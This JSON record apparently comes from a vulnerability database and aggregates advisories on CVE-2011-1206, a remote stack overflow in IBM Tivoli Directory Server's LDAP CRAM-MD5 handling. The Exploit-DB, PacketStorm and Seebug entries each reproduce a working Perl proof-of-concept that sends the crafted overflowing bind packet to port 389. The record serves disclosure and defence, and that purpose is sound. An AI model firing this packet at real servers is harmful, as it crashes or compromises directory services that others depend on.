{"cve": [{"lastseen": "2019-05-29T18:11:08", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in the server process in ibmslapd.exe in IBM Tivoli Directory Server (TDS) 5.2 before 5.2.0.5-TIV-ITDS-IF0010, 6.0 before 6.0.0.67 (aka 6.0.0.8-TIV-ITDS-IF0009), 6.1 before 6.1.0.40 (aka 6.1.0.5-TIV-ITDS-IF0003), 6.2 before 6.2.0.16 (aka 6.2.0.3-TIV-ITDS-IF0002), and 6.3 before 6.3.0.3 (aka 6.3.0.0-TIV-ITDS-IF0003) allows remote attackers to execute arbitrary code via a crafted LDAP request. NOTE: some of these details are obtained from third party information.", "modified": "2017-08-17T01:34:00", "id": "CVE-2011-1206", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1206", "published": "2011-04-21T10:55:00", "title": "CVE-2011-1206", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-02T07:23:00", "bulletinFamily": "exploit", "description": "IBM Tivoli Directory Server SASL Bind Request Remote Code Execution. CVE-2011-1206. Dos exploit for windows platform", "modified": "2011-04-19T00:00:00", "published": "2011-04-19T00:00:00", "id": "EDB-ID:17188", "href": "https://www.exploit-db.com/exploits/17188/", "type": "exploitdb", "title": "IBM Tivoli Directory Server SASL Bind Request Remote Code Execution", "sourceData": "Source: http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=26&Itemid=26\r\n\r\n#####################################################################################\r\n\r\nApplication: IBM Tivoli Directory Server SASL Bind Request Remote Code Execution Vulnerability\r\n\r\nPlatforms: Windows\r\n\r\nExploitation: Remote code execution\r\n\r\nCVE Number: CVE-2011-1206 \r\n\r\nZDI number: ZDI-11-136\r\n\r\n{PRL}: 2011-06\r\n\r\nAuthor: Francis Provencher (Protek Research Lab's)\r\n\r\nWebSite: http://www.protekresearchlab.com/\r\n\r\nTwitter: @ProtekResearch\r\n\r\n\r\n#####################################################################################\r\n\r\n1) Introduction\r\n2) Report Timeline\r\n3) Technical details\r\n4) POC\r\n\r\n#####################################################################################\r\n\r\n===============\r\n1) Introduction\r\n===============\r\n\r\nIBM Tivoli Directory Server (ITDS), formerly known as IBM Directory Server,\r\n\r\nis an IBM implementation of the Lightweight Directory Access Protocol,\r\n\r\nand is part of the IBM Tivoli Identity & Access Management portfolio.\r\n\r\nIBM Tivoli Directory Server is a powerful, security-rich and standards-compliant\r\n\r\nenterprise directory for corporate intranets and the Internet. Directory Server is\r\n\r\nbuilt to serve as the identity data foundation for rapid development and deployment\r\n\r\nof Web applications and security and identity management initiatives by including\r\n\r\nstrong management, replication and security features.Several authentication methods\r\n\r\nare available with IBM Tivoli Directory Server, beyond basic usernames and passwords.\r\n\r\nITDS supports digital certificate-based authentication, the Simple Authentication and\r\n\r\nSecurity Layer (SASL), Challenge-Response Authentication Mechanism MD5 (CRAM-MD5),\r\n\r\nand Kerberos authentication.IBM Tivoli Directory Server is a powerful LDAP\r\n\r\ninfrastructure that provides a foundation for deploying comprehensive identity management\r\n\r\napplications and advanced software architectures.\r\n\r\n(http://en.wikipedia.org/wiki/IBM_Tivoli_Directory_Server)\r\n\r\n#####################################################################################\r\n\r\n============================\r\n2) Report Timeline\r\n============================\r\n\r\n2011-02-17 - Vulnerability reported to vendor\r\n2011-04-18 - Coordinated public release of advisory\r\n\r\n\r\n#####################################################################################\r\n\r\n====================\r\n3) Technical details\r\n====================\r\n\r\nThis vulnerability allows remote attackers to execute arbitrary code on vulnerable\r\n\r\ninstallations of IBM Tivoli Directory Server. Authentication is not required to\r\n\r\nexploit this vulnerability. The specific flaw exists in how ibmslapd.exe handles\r\n\r\nLDAP CRAM-MD5 packets. ibmslapd.exe listens by default on port TCP 389. When the\r\n\r\nprocess receives an LDAP CRAM-MD5 packet, it uses libibmldap.dll to handle the\r\n\r\nallocation of a buffer for the packet data. A specially crafted packet can cause\r\n\r\nthe ber_get_int function to allocate a buffer that is too small to fit the packet\r\n\r\ndata, causing a subsequent stack-based buffer overflow. This can be leveraged by\r\n\r\na remote attacker to execute arbitrary code under the context of the SYSTEM user.\r\n\r\n\r\n#####################################################################################\r\n\r\n===========\r\n4) POC\r\n===========\r\n\r\n#!/usr/bin/perl\r\n\r\n\r\nuse strict;\r\nuse warnings;\r\n\r\nuse Getopt::Std;\r\nuse IO::Socket::INET;\r\n\r\n$SIG{INT} = \\&abort;\r\n\r\nmy $host = '192.168.100.24';\r\nmy $port = 389;\r\nmy $proto = 'tcp';\r\nmy $sockType = SOCK_STREAM;\r\nmy $timeout = 1;\r\n\r\nmy %opt;\r\nmy $opt_string = 'hH:P:t:';\r\ngetopts( \"$opt_string\", \\%opt );\r\n\r\nif (defined $opt{h}) {\r\n usage()\r\n}\r\n\r\n$host = $opt{H} ? $opt{H} : $host;\r\n$port = $opt{P} ? $opt{P} : $port;\r\n$timeout = $opt{t} ? $opt{t} : $timeout;\r\n\r\nmy @commands = (\r\n{Command => 'Send',\r\n Data => \"\\x30\\x18\\x02\\x01\\x01\\x60\\x13\\x02\\x01\\x03\\x04\\x00\\xA3\\x0C\\x04\\x08\\x43\\x52\\x41\\x4D\\x2D\\x4D\\x44\\x35\\x04\\x00\"},\r\n{Command => 'Receive'},\r\n{Command => 'Send',\r\n Data => \"\\x30\\x82\\x01\\x41\\x02\\x01\\x02\\x60\\x82\\x01\\x3A\\x02\\x01\\x03\\x04\\x00\\xA3\\x82\\x01\\x31\\x04\\x08\\x43\\x52\\x41\\x4D\\x2D\\x4D\\x44\\x35\\x04\\x84\\xFF\\xFF\\xFF\\xFF\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x20\\x36\\x61\\x37\\x61\\x31\\x31\\x34\\x39\\x36\\x30\\x33\\x61\\x64\\x37\\x64\\x30\\x33\\x34\\x39\\x35\\x66\\x39\\x65\\x37\\x31\\x34\\x66\\x34\\x30\\x66\\x31\\x63\"},\r\n{Command => 'Receive'},\r\n\r\n);\r\n\r\n\r\nmy $sock = new IO::Socket::INET (\t\r\n PeerAddr => $host,\r\n\t\t\t\t PeerPort => $port, \r\n\t\t\t\t Proto => $proto,\r\n Type => $sockType,\r\n Timeout => $timeout,\r\n ) \r\n or die \"socket error: $!\\n\\n\";\r\n\r\nprint \"connected to: $host:$port\\n\";\r\n\r\n$sock->autoflush(1);\r\nbinmode $sock;\r\n\r\n\r\nforeach my $command (@commands)\r\n{\r\n if ($command->{'Command'} eq 'Receive')\r\n {\r\n my $buf = receive($sock, $timeout);\r\n if (length $buf)\r\n {\r\n print \"received: [$buf]\\n\";\r\n }\r\n }\r\n elsif ($command->{'Command'} eq 'Send')\r\n {\r\n print \"sending: [\".$command->{'Data'}.\"]\\n\";\r\n send ($sock, $command->{'Data'}, 0) or die \"send failed, reason: $!\\n\";\r\n }\r\n}\r\n\r\nclose ($sock);\r\n\r\n\r\nsub receive\r\n{\r\n my $sock = shift;\r\n my $timeout = shift;\r\n\r\n my $tmpbuf;\r\n my $buf = \"\";\r\n\r\n while(1)\r\n { \r\n eval {\r\n local $SIG{ALRM} = sub { die \"timeout\\n\" };\r\n alarm $timeout;\r\n\r\n my $ret = read $sock, $tmpbuf, 1; \r\n if ( !defined $ret or $ret == 0 )\r\n { \r\n die \"timeout\\n\";\r\n }\r\n\r\n alarm 0;\r\n $buf .= $tmpbuf;\r\n };\r\n if ($@) { \r\n if($@ eq \"timeout\\n\")\r\n {\r\n last;\r\n }\r\n else {\r\n die \"receive aborted\\n\";\r\n }\r\n }\r\n } \r\n return $buf;\r\n}\r\n\r\nsub abort\r\n{\r\n print \"...\\n\";\r\n if ($sock)\r\n {\r\n close $sock;\r\n }\r\n die \"...\\n\";\r\n}\r\nsub usage\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/17188/"}], "zdi": [{"lastseen": "2016-11-09T00:17:58", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of IBM Tivoli Directory Server. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists in how ibmslapd.exe handles LDAP CRAM-MD5 packets. ibmslapd.exe listens by default on port TCP 389. When the process receives an LDAP CRAM-MD5 packet, it uses libibmldap.dll to handle the allocation of a buffer for the packet data. A specially crafted packet can cause the ber_get_int function to allocate a buffer that is too small to fit the packet data, causing a subsequent stack-based buffer overflow. This can be leveraged by a remote attacker to execute arbitrary code under the context of the SYSTEM user.", "modified": "2011-11-09T00:00:00", "published": "2011-04-18T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-11-136", "id": "ZDI-11-136", "title": "IBM Tivoli Directory Server ibmslapd.exe SASL Bind Request Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:21:21", "bulletinFamily": "exploit", "description": "", "modified": "2011-04-19T00:00:00", "published": "2011-04-19T00:00:00", "href": "https://packetstormsecurity.com/files/100576/IBM-Tivoli-Directory-Server-SASL-Bind-Request-Remote-Code-Execution.html", "id": "PACKETSTORM:100576", "type": "packetstorm", "title": "IBM Tivoli Directory Server SASL Bind Request Remote Code Execution", "sourceData": "`##################################################################################### \n \nApplication: IBM Tivoli Directory Server SASL Bind Request Remote Code Execution Vulnerability \n \nPlatforms: Windows \n \nExploitation: Remote code execution \n \nCVE Number: CVE-2011-1206 \n \nZDI number: ZDI-11-136 \n \n{PRL}: 2011-06 \n \nAuthor: Francis Provencher (Protek Research Lab's) \n \nWebSite: http://www.protekresearchlab.com/ \n \nTwitter: @ProtekResearch \n \n \n##################################################################################### \n \n1) Introduction \n2) Report Timeline \n3) Technical details \n4) POC \n \n##################################################################################### \n \n=============== \n1) Introduction \n=============== \n \nIBM Tivoli Directory Server (ITDS), formerly known as IBM Directory Server, \n \nis an IBM implementation of the Lightweight Directory Access Protocol, \n \nand is part of the IBM Tivoli Identity & Access Management portfolio. \n \nIBM Tivoli Directory Server is a powerful, security-rich and standards-compliant \n \nenterprise directory for corporate intranets and the Internet. Directory Server is \n \nbuilt to serve as the identity data foundation for rapid development and deployment \n \nof Web applications and security and identity management initiatives by including \n \nstrong management, replication and security features.Several authentication methods \n \nare available with IBM Tivoli Directory Server, beyond basic usernames and passwords. \n \nITDS supports digital certificate-based authentication, the Simple Authentication and \n \nSecurity Layer (SASL), Challenge-Response Authentication Mechanism MD5 (CRAM-MD5), \n \nand Kerberos authentication.IBM Tivoli Directory Server is a powerful LDAP \n \ninfrastructure that provides a foundation for deploying comprehensive identity management \n \napplications and advanced software architectures. \n \n(http://en.wikipedia.org/wiki/IBM_Tivoli_Directory_Server) \n \n##################################################################################### \n \n============================ \n2) Report Timeline \n============================ \n \n2011-02-17 - Vulnerability reported to vendor \n2011-04-18 - Coordinated public release of advisory \n \n \n##################################################################################### \n \n==================== \n3) Technical details \n==================== \n \nThis vulnerability allows remote attackers to execute arbitrary code on vulnerable \n \ninstallations of IBM Tivoli Directory Server. Authentication is not required to \n \nexploit this vulnerability. The specific flaw exists in how ibmslapd.exe handles \n \nLDAP CRAM-MD5 packets. ibmslapd.exe listens by default on port TCP 389. When the \n \nprocess receives an LDAP CRAM-MD5 packet, it uses libibmldap.dll to handle the \n \nallocation of a buffer for the packet data. A specially crafted packet can cause \n \nthe ber_get_int function to allocate a buffer that is too small to fit the packet \n \ndata, causing a subsequent stack-based buffer overflow. This can be leveraged by \n \na remote attacker to execute arbitrary code under the context of the SYSTEM user. \n \n \n##################################################################################### \n \n=========== \n4) POC \n=========== \n \n \n \n#!/usr/bin/perl \n \n \nuse strict; \nuse warnings; \n \nuse Getopt::Std; \nuse IO::Socket::INET; \n \n$SIG{INT} = \\&abort; \n \nmy $host = '192.168.100.24'; \nmy $port = 389; \nmy $proto = 'tcp'; \nmy $sockType = SOCK_STREAM; \nmy $timeout = 1; \n \nmy %opt; \nmy $opt_string = 'hH:P:t:'; \ngetopts( \"$opt_string\", \\%opt ); \n \nif (defined $opt{h}) { \nusage() \n} \n \n$host = $opt{H} ? $opt{H} : $host; \n$port = $opt{P} ? $opt{P} : $port; \n$timeout = $opt{t} ? $opt{t} : $timeout; \n \nmy @commands = ( \n{Command => 'Send', \nData => \"\\x30\\x18\\x02\\x01\\x01\\x60\\x13\\x02\\x01\\x03\\x04\\x00\\xA3\\x0C\\x04\\x08\\x43\\x52\\x41\\x4D\\x2D\\x4D\\x44\\x35\\x04\\x00\"}, \n{Command => 'Receive'}, \n{Command => 'Send', \nData => \"\\x30\\x82\\x01\\x41\\x02\\x01\\x02\\x60\\x82\\x01\\x3A\\x02\\x01\\x03\\x04\\x00\\xA3\\x82\\x01\\x31\\x04\\x08\\x43\\x52\\x41\\x4D\\x2D\\x4D\\x44\\x35\\x04\\x84\\xFF\\xFF\\xFF\\xFF\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x20\\x36\\x61\\x37\\x61\\x31\\x31\\x34\\x39\\x36\\x30\\x33\\x61\\x64\\x37\\x64\\x30\\x33\\x34\\x39\\x35\\x66\\x39\\x65\\x37\\x31\\x34\\x66\\x34\\x30\\x66\\x31\\x63\"}, \n{Command => 'Receive'}, \n \n); \n \n \nmy $sock = new IO::Socket::INET ( \nPeerAddr => $host, \nPeerPort => $port, \nProto => $proto, \nType => $sockType, \nTimeout => $timeout, \n) \nor die \"socket error: $!\\n\\n\"; \n \nprint \"connected to: $host:$port\\n\"; \n \n$sock->autoflush(1); \nbinmode $sock; \n \n \nforeach my $command (@commands) \n{ \nif ($command->{'Command'} eq 'Receive') \n{ \nmy $buf = receive($sock, $timeout); \nif (length $buf) \n{ \nprint \"received: [$buf]\\n\"; \n} \n} \nelsif ($command->{'Command'} eq 'Send') \n{ \nprint \"sending: [\".$command->{'Data'}.\"]\\n\"; \nsend ($sock, $command->{'Data'}, 0) or die \"send failed, reason: $!\\n\"; \n} \n} \n \nclose ($sock); \n \n \nsub receive \n{ \nmy $sock = shift; \nmy $timeout = shift; \n \nmy $tmpbuf; \nmy $buf = \"\"; \n \nwhile(1) \n{ \neval { \nlocal $SIG{ALRM} = sub { die \"timeout\\n\" }; \nalarm $timeout; \n \nmy $ret = read $sock, $tmpbuf, 1; \nif ( !defined $ret or $ret == 0 ) \n{ \ndie \"timeout\\n\"; \n} \n \nalarm 0; \n$buf .= $tmpbuf; \n}; \nif ($@) { \nif($@ eq \"timeout\\n\") \n{ \nlast; \n} \nelse { \ndie \"receive aborted\\n\"; \n} \n} \n} \nreturn $buf; \n} \n \nsub abort \n{ \nprint \"...\\n\"; \nif ($sock) \n{ \nclose $sock; \n} \ndie \"...\\n\"; \n} \nsub usage \n \n \n \n##################################################################################### \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/100576/PRL-2011-06.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T16:44:11", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-71628", "id": "SSV:71628", "title": "IBM Tivoli Directory Server SASL Bind Request Remote Code Execution", "type": "seebug", "sourceData": "\n Source: http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=26&Itemid=26\r\n\r\n#####################################################################################\r\n\r\nApplication: IBM Tivoli Directory Server SASL Bind Request Remote Code Execution Vulnerability\r\n\r\nPlatforms: Windows\r\n\r\nExploitation: Remote code execution\r\n\r\nCVE Number: CVE-2011-1206 \r\n\r\nZDI number: ZDI-11-136\r\n\r\n{PRL}: 2011-06\r\n\r\nAuthor: Francis Provencher (Protek Research Lab's)\r\n\r\nWebSite: http://www.protekresearchlab.com/\r\n\r\nTwitter: @ProtekResearch\r\n\r\n\r\n#####################################################################################\r\n\r\n1) Introduction\r\n2) Report Timeline\r\n3) Technical details\r\n4) POC\r\n\r\n#####################################################################################\r\n\r\n===============\r\n1) Introduction\r\n===============\r\n\r\nIBM Tivoli Directory Server (ITDS), formerly known as IBM Directory Server,\r\n\r\nis an IBM implementation of the Lightweight Directory Access Protocol,\r\n\r\nand is part of the IBM Tivoli Identity & Access Management portfolio.\r\n\r\nIBM Tivoli Directory Server is a powerful, security-rich and standards-compliant\r\n\r\nenterprise directory for corporate intranets and the Internet. Directory Server is\r\n\r\nbuilt to serve as the identity data foundation for rapid development and deployment\r\n\r\nof Web applications and security and identity management initiatives by including\r\n\r\nstrong management, replication and security features.Several authentication methods\r\n\r\nare available with IBM Tivoli Directory Server, beyond basic usernames and passwords.\r\n\r\nITDS supports digital certificate-based authentication, the Simple Authentication and\r\n\r\nSecurity Layer (SASL), Challenge-Response Authentication Mechanism MD5 (CRAM-MD5),\r\n\r\nand Kerberos authentication.IBM Tivoli Directory Server is a powerful LDAP\r\n\r\ninfrastructure that provides a foundation for deploying comprehensive identity management\r\n\r\napplications and advanced software architectures.\r\n\r\n(http://en.wikipedia.org/wiki/IBM_Tivoli_Directory_Server)\r\n\r\n#####################################################################################\r\n\r\n============================\r\n2) Report Timeline\r\n============================\r\n\r\n2011-02-17 - Vulnerability reported to vendor\r\n2011-04-18 - Coordinated public release of advisory\r\n\r\n\r\n#####################################################################################\r\n\r\n====================\r\n3) Technical details\r\n====================\r\n\r\nThis vulnerability allows remote attackers to execute arbitrary code on vulnerable\r\n\r\ninstallations of IBM Tivoli Directory Server. Authentication is not required to\r\n\r\nexploit this vulnerability. The specific flaw exists in how ibmslapd.exe handles\r\n\r\nLDAP CRAM-MD5 packets. ibmslapd.exe listens by default on port TCP 389. When the\r\n\r\nprocess receives an LDAP CRAM-MD5 packet, it uses libibmldap.dll to handle the\r\n\r\nallocation of a buffer for the packet data. A specially crafted packet can cause\r\n\r\nthe ber_get_int function to allocate a buffer that is too small to fit the packet\r\n\r\ndata, causing a subsequent stack-based buffer overflow. This can be leveraged by\r\n\r\na remote attacker to execute arbitrary code under the context of the SYSTEM user.\r\n\r\n\r\n#####################################################################################\r\n\r\n===========\r\n4) POC\r\n===========\r\n\r\n#!/usr/bin/perl\r\n\r\n\r\nuse strict;\r\nuse warnings;\r\n\r\nuse Getopt::Std;\r\nuse IO::Socket::INET;\r\n\r\n$SIG{INT} = \\&abort;\r\n\r\nmy $host = '192.168.100.24';\r\nmy $port = 389;\r\nmy $proto = 'tcp';\r\nmy $sockType = SOCK_STREAM;\r\nmy $timeout = 1;\r\n\r\nmy %opt;\r\nmy $opt_string = 'hH:P:t:';\r\ngetopts( "$opt_string", \\%opt );\r\n\r\nif (defined $opt{h}) {\r\n usage()\r\n}\r\n\r\n$host = $opt{H} ? $opt{H} : $host;\r\n$port = $opt{P} ? $opt{P} : $port;\r\n$timeout = $opt{t} ? $opt{t} : $timeout;\r\n\r\nmy @commands = (\r\n{Command => 'Send',\r\n Data => "\\x30\\x18\\x02\\x01\\x01\\x60\\x13\\x02\\x01\\x03\\x04\\x00\\xA3\\x0C\\x04\\x08\\x43\\x52\\x41\\x4D\\x2D\\x4D\\x44\\x35\\x04\\x00"},\r\n{Command => 'Receive'},\r\n{Command => 'Send',\r\n Data => "\\x30\\x82\\x01\\x41\\x02\\x01\\x02\\x60\\x82\\x01\\x3A\\x02\\x01\\x03\\x04\\x00\\xA3\\x82\\x01\\x31\\x04\\x08\\x43\\x52\\x41\\x4D\\x2D\\x4D\\x44\\x35\\x04\\x84\\xFF\\xFF\\xFF\\xFF\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x20\\x36\\x61\\x37\\x61\\x31\\x31\\x34\\x39\\x36\\x30\\x33\\x61\\x64\\x37\\x64\\x30\\x33\\x34\\x39\\x35\\x66\\x39\\x65\\x37\\x31\\x34\\x66\\x34\\x30\\x66\\x31\\x63"},\r\n{Command => 'Receive'},\r\n\r\n);\r\n\r\n\r\nmy $sock = new IO::Socket::INET (\t\r\n PeerAddr => $host,\r\n\t\t\t\t PeerPort => $port, \r\n\t\t\t\t Proto => $proto,\r\n Type => $sockType,\r\n Timeout => $timeout,\r\n ) \r\n or die "socket error: $!\\n\\n";\r\n\r\nprint "connected to: $host:$port\\n";\r\n\r\n$sock->autoflush(1);\r\nbinmode $sock;\r\n\r\n\r\nforeach my $command (@commands)\r\n{\r\n if ($command->{'Command'} eq 'Receive')\r\n {\r\n my $buf = receive($sock, $timeout);\r\n if (length $buf)\r\n {\r\n print "received: [$buf]\\n";\r\n }\r\n }\r\n elsif ($command->{'Command'} eq 'Send')\r\n {\r\n print "sending: [".$command->{'Data'}."]\\n";\r\n send ($sock, $command->{'Data'}, 0) or die "send failed, reason: $!\\n";\r\n }\r\n}\r\n\r\nclose ($sock);\r\n\r\n\r\nsub receive\r\n{\r\n my $sock = shift;\r\n my $timeout = shift;\r\n\r\n my $tmpbuf;\r\n my $buf = "";\r\n\r\n while(1)\r\n { \r\n eval {\r\n local $SIG{ALRM} = sub { die "timeout\\n" };\r\n alarm $timeout;\r\n\r\n my $ret = read $sock, $tmpbuf, 1; \r\n if ( !defined $ret or $ret == 0 )\r\n { \r\n die "timeout\\n";\r\n }\r\n\r\n alarm 0;\r\n $buf .= $tmpbuf;\r\n };\r\n if ($@) { \r\n if($@ eq "timeout\\n")\r\n {\r\n last;\r\n }\r\n else {\r\n die "receive aborted\\n";\r\n }\r\n }\r\n } \r\n return $buf;\r\n}\r\n\r\nsub abort\r\n{\r\n print "...\\n";\r\n if ($sock)\r\n {\r\n close $sock;\r\n }\r\n die "...\\n";\r\n}\r\nsub usage\r\n\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-71628"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:39", "bulletinFamily": "software", "description": "ZDI-11-136 (formerly ZDI-CAN-1022): IBM Tivoli Directory Server ibmslapd.exe SASL Bind Request\r\nRemote Code Execution Vulnerability\r\n\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-11-136\r\n\r\nApril 18, 2011\r\n\r\n-- CVE ID:\r\nCVE-2011-1206\r\n\r\n-- CVSS:\r\n10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)\r\n\r\n-- Affected Vendors:\r\nIBM\r\n\r\n-- Affected Products:\r\nIBM Tivoli Directory Server\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 11092. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of IBM Tivoli Directory Server. Authentication\r\nis not required to exploit this vulnerability.\r\n\r\nThe specific flaw exists in how ibmslapd.exe handles LDAP CRAM-MD5\r\npackets. ibmslapd.exe listens by default on port TCP 389. When the\r\nprocess receives an LDAP CRAM-MD5 packet, it uses libibmldap.dll to\r\nhandle the allocation of a buffer for the packet data. A specially\r\ncrafted packet can cause the ber_get_int function to allocate a buffer\r\nthat is too small to fit the packet data, causing a subsequent\r\nstack-based buffer overflow. This can be leveraged by a remote attacker\r\nto execute arbitrary code under the context of the SYSTEM user.\r\n\r\n-- Vendor Response:\r\nIBM has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttps://www-304.ibm.com/support/docview.wss?uid=swg21496117\r\n\r\n-- Disclosure Timeline:\r\n2011-02-17 - Vulnerability reported to vendor\r\n2011-04-18 - 